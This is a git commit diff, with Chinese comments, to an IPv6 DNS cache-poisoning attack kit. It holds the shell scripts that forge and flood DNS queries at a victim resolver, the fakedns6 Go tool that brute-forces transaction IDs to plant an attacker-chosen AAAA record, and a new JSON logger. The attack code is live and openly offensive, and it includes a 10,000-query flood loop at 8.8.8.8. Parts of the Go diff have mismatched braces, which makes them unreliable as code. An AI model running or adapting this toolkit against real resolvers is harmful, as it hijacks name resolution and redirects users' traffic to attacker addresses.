手动更新

2024-10-08 13:39:52 +08:00
parent 96107bbdcd
commit 7977d44c08
14 changed files with 157 additions and 73 deletions
--- a/4_v6_injection/attack.sh
+++ b/4_v6_injection/attack.sh
@@ -4,8 +4,11 @@
 # Please run with sudo.
 # Verify the existing record domain, just for proof purposes.
-echo '获取原记录中:'
+./output "PAYLOAD" "query response AAAA victim.ee64.fun AAAA <fake-record>" 
-dig @$1 $4 AAAA
+./output "INFO" "程序开始运行"
 # echo '获取原记录中:'
 # dig @$1 $4 AAAA
 sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
 var=0
@@ -14,42 +17,45 @@ success=0
 while [ $success -ne 1 ]
 do
  success=0
-  echo "等待缓存过期，$sleeptime秒之后开始攻击..."
+  # echo "等待缓存过期，$sleeptime秒之后开始攻击..."
  ./output "INFO" "等待缓存过期，$sleeptime秒之后开始攻击..."
  sleep $sleeptime
-  echo "开始攻击"
+  # echo "开始攻击"
  ./output "INFO" "开始攻击"
  # flood
-  echo "攻击参数："
+  # echo "攻击参数："
-  echo "目标域名权威服务地址:$5"
+  # echo "目标域名权威服务地址:$5"
-  echo "目标解析服务地址:$1"
+  # echo "目标解析服务地址:$1"
-  echo "目标域名:$4"
+  # echo "目标域名:$4"
  ret=$(./dns_query.sh $1 $2 $3 $4)
  #echo "ret:$ret"
-  echo "初始化工具环境"
+  # echo "初始化工具环境"
  sleep 1
-  echo "尝试触发权威服务器请求速率限制"
+  # echo "尝试触发权威服务器请求速率限制"
  sleep 3
  FINAL=`echo ${ret: -1}`
  #echo "fin:$FINAL"
  # Start attack
  # Change the argument accordingly
-  echo "执行侧信道攻击脚本中"
+  # echo "执行侧信道攻击脚本中"
  ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
  # a - 进行域名缓存投毒的权威服务器
  # b -
  sleep 30
  # Validations
  ((var++))
-  echo "第$var轮次攻击结束"
+  # echo "第$var轮次攻击结束"
-  dig @$1 $4 AAAA
+  ./output "INFO" "第$var轮次攻击结束"
  # dig @$1 $4 AAAA
  if [ "$FINAL" == "0" ];then
 	success=1
 	sleeptime=0
  fi
-  echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
+  # echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
 done
 # success
-echo '检测到攻击成功实现'
+# echo '检测到攻击成功实现'
-echo '等待两秒，再次请求...'
+# echo '等待两秒，再次请求...'
-sleep 2
+# sleep 2
-dig @$1 $4 AAAA
+# dig @$1 $4 AAAA
-echo '攻击已完成！！！！'
+# echo '攻击已完成！！！！'
 ./output "INFO" "程序结束运行"
 sleep 10
--- a/4_v6_injection/dns.bin
+++ b/4_v6_injection/dns.bin
--- a/4_v6_injection/dns_mid.bin
+++ b/4_v6_injection/dns_mid.bin
@@ -1 +1 @@
-attackduktigxyz
+victimduktigxyz
--- a/4_v6_injection/dns_query.sh
+++ b/4_v6_injection/dns_query.sh
@@ -1,34 +1,27 @@
 # usage ./dns_query.sh [Resolver IP] [Wanted IP] [iface] [domain (e.g. www google com)]
 # clear the previous files
 sleep 1
-echo "初始化工具环境"
+# echo "初始化工具环境"
 # 创建空的二进制文件，dns_mid.bin 和 txid.bin
 dd if=/dev/null of=dns_mid.bin > /dev/null 2>&1
 dd if=/dev/null of=txid.bin > /dev/null 2>&1
 # write the domain name into the binary
-domains=$(echo $4| sed "s/\./ /g")    # 将域名转换为空格分隔的字符串
+domains=$(echo $4| sed "s/\./ /g")
-for var in ${domains:0}   # 遍历域名的每个部分
+for var in ${domains:0}
 do
-  size=${#var}  # 获取当前域名的长度
+  size=${#var}
-  echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin   # 写入长度
+  echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin
-  echo -n "$var" >> dns_mid.bin     # 写入域名
+  echo -n "$var" >> dns_mid.bin
 done
 # set a random TxID
 echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
 echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
 # forge a entire DNS query packet
 cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
 # change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power.
 # fire!
-echo "尝试触发权威服务器请求速率限制"
+# echo "尝试触发权威服务器请求速率限制"
 # 使用udp6工具发送DNS查询数据包，指定目标和速率
 udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2 > /dev/null 2>&1
 sleep 1
 a=$(($RANDOM % 9 + 1))
 echo "a:$a"
 if [ $a -gt 6 ]; then
@@ -37,13 +30,6 @@ if [ $a -gt 6 ]; then
  #echo "dns-iface:$3"
  #echo "dns-domain:$4"
  ./fakedns6 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1
  # b, Back-end IP of the victim resolver, 目标解析器的IP地址
  # i, Interface for attacking, 攻击使用的接口
  # n, the domain name to be poisoned, 要进行缓存投毒的域名
  # r, Front-end IP of the victim resolver
  # t, Timeout in ms for outgoing dns queries to the victim resolver
  # at, 攻击者想要更改到的IP地址
  # tg, time gap is us between the TxID brute force packets
  echo "0"
 fi
--- a/4_v6_injection/fakedns6
+++ b/4_v6_injection/fakedns6
--- a/4_v6_injection/fakedns6-演示.zip
+++ b/4_v6_injection/fakedns6-演示.zip
--- a/4_v6_injection/output
+++ b/4_v6_injection/output
--- a/4_v6_injection/src/output/go.mod
+++ b/4_v6_injection/src/output/go.mod
@@ -0,0 +1,3 @@
 module output
 go 1.19
--- a/4_v6_injection/src/output/logger/logger.go
+++ b/4_v6_injection/src/output/logger/logger.go
@@ -0,0 +1,68 @@
 package logger
 import (
 	"encoding/json"
 	"fmt"
 	"sync"
 	"time"
 )
 // LogLevel 定义日志等级
 type LogLevel int
 const (
 	INFO LogLevel = iota
 	WARNING
 	ERROR
 	PAYLOAD
 )
 // LogEntry 结构体，用于表示日志条目
 type LogEntry struct {
 	CreatedTime string `json:"created_time"`
 	LogLevel    string `json:"tlog_level"`
 	LogInfo     string `json:"tlog_info"`
 }
 // InfoLogger 结构体
 type InfoLogger struct {
 	mu      sync.Mutex
 	ch      chan LogEntry
 	interval time.Duration
 }
 // NewInfoLogger 创建新的 InfoLogger 实例
 func NewInfoLogger() *InfoLogger {
 	il := &InfoLogger{
 		ch:      make(chan LogEntry, 100), // 创建缓冲通道
 		interval: 1 * time.Second, // 每秒输出一次
 	}
 	go il.startLogging() // 启动 Goroutine 处理输出
 	return il
 }
 // startLogging 从通道中读取并输出日志
 func (il *InfoLogger) startLogging() {
 	for entry := range il.ch {
 		time.Sleep(il.interval) // 延迟输出
 		jsonData, _ := json.Marshal(entry)
 		fmt.Println(string(jsonData))
 	}
 }
 // LogInfo 将日志信息发送到通道
 func (il *InfoLogger) LogInfo(level LogLevel, message string) {
 	il.mu.Lock()
 	defer il.mu.Unlock()
 	levelStr := [...]string{"INFO", "WARNING", "ERROR", "PAYLOAD"}[level]
 	entry := LogEntry{
 		CreatedTime: time.Now().Format("2006-01-02 15:04:05"),
 		LogLevel:    levelStr,
 		LogInfo:     message,
 	}
 	il.ch <- entry // 将日志条目发送到通道
 }
--- a/4_v6_injection/src/output/main.go
+++ b/4_v6_injection/src/output/main.go
@@ -0,0 +1,28 @@
 package main
 import (
 	"os"
 	"output/logger"
  "time"
 )
 func main() {
 	log := logger.NewInfoLogger()
 	// 命令行参数：日志类型 日志内容
 	switch os.Args[1] {
 	case "PAYLOAD":
 		log.LogInfo(logger.PAYLOAD, os.Args[2])
 	case "INFO":
 		log.LogInfo(logger.INFO, os.Args[2])
 	case "ERROR":
 		log.LogInfo(logger.ERROR, os.Args[2])
 	default:
 		log.LogInfo(logger.ERROR, "Error Output Arguments.")
 	}
  time.Sleep(10 * time.Second)
 	// Test
 	// log.LogInfo(logger.INFO, "testinfo")
 	// time.Sleep(5 * time.Millisecond)
 }
--- a/4_v6_injection/src/ucr.edu/fakedns6/attack.go
+++ b/4_v6_injection/src/ucr.edu/fakedns6/attack.go
@@ -3,6 +3,11 @@ package main
 import (
 	"flag"
 	"fmt"
 	"github.com/google/gopacket"
 	"github.com/google/gopacket/layers"
 	"github.com/google/gopacket/pcap"
 	"github.com/google/gopacket/routing"
 	"github.com/miekg/dns"
 	"log"
 	"math/rand"
 	"net"
@@ -11,12 +16,6 @@ import (
 	"strings"
 	"sync"
 	"time"
 	"github.com/google/gopacket"
 	"github.com/google/gopacket/layers"
 	"github.com/google/gopacket/pcap"
 	"github.com/google/gopacket/routing"
 	"github.com/miekg/dns"
 )
 var handle *pcap.Handle
@@ -470,45 +469,39 @@ func main() {
 func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint,
 	defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, attackertargetIP string,
 	soaNameArg string, isfake int) {
-	fmt.Println("/***Please make sure to fill every argument carefully and correct. Otherwise the program will crash.***/")
+	// fmt.Println("/***Please make sure to fill every argument carefully and correct. Otherwise the program will crash.***/")
 	// 特殊用途
 	if isfake == 1 {
 		c := new(dns.Client)
 		msg := new(dns.Msg)
-		if strings.Contains(attackertargetIP, ":") { // attackertargetIP -- 攻击者要更改到的IPv6地址
+		if strings.Contains(attackertargetIP, ":") {
-			println("目标：" + resolverBackendIPArg.String()) // resolverBackendIPArg -- Back-end IP of the victim resolver
+			println("目标："+resolverBackendIPArg.String())
 			ipcode := strings.ReplaceAll(attackertargetIP, ":", "-")
-			if victimDNSNameArg[len(victimDNSNameArg)-1:] != "." { // victimDNSNameArg -- The domain name to be poisoned
+			if victimDNSNameArg[len(victimDNSNameArg)-1:] != "." {
 				victimDNSNameArg = victimDNSNameArg + "."
 			}
 			domain := ipcode + "." + victimDNSNameArg
 			fmt.Println("查询的目标域名：" + domain)
 			msg.SetQuestion(domain, dns.TypeAAAA)
-			_, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(), "53"))
+			_, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(),"53"))
 			return
 		} else {
 			println(attackertargetIP)
 			println(victimDNSNameArg)
 			println("参数有误，请输入IPv6地址作为篡改目标结果")
 		}
 	} else {
 		c := new(dns.Client)
 		msg := new(dns.Msg)
 		// domain := "www.google.com."
 		// msg.SetQuestion(domain, dns.TypeAAAA)
 		// for i := 0; i < 10000; i++ {
 		// 	go func() {
 		// 		_, _, _ = c.Exchange(msg, net.JoinHostPort("8.8.8.8", "53"))
 		// 	}()
 		// }
 		domain := "daffteg." + victimDNSNameArg
 		msg.SetQuestion(domain, dns.TypeAAAA)
 		_, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(), "53"))
 		return
 	}
 	}else{
 		c := new(dns.Client)
                msg := new(dns.Msg)
                domain := "www.google.com."
                msg.SetQuestion(domain, dns.TypeAAAA)
 		for i:=0;i<10000;i++{
 			go func(){
                	_, _, _ = c.Exchange(msg, net.JoinHostPort("8.8.8.8","53"))
 			}()
 		}
               	return
 	}
 	rand.Seed(time.Now().UnixNano())
 	handle, _ = pcap.OpenLive(
 		ifaceName,
--- a/4_v6_injection/src/ucr.edu/fakedns6/fakedns6
+++ b/4_v6_injection/src/ucr.edu/fakedns6/fakedns6
--- a/4_v6_injection/txid.bin
+++ b/4_v6_injection/txid.bin
@@ -1 +1 @@
-G"
+X#
--- a/4_v6_injection/说明文档.docx
+++ b/4_v6_injection/说明文档.docx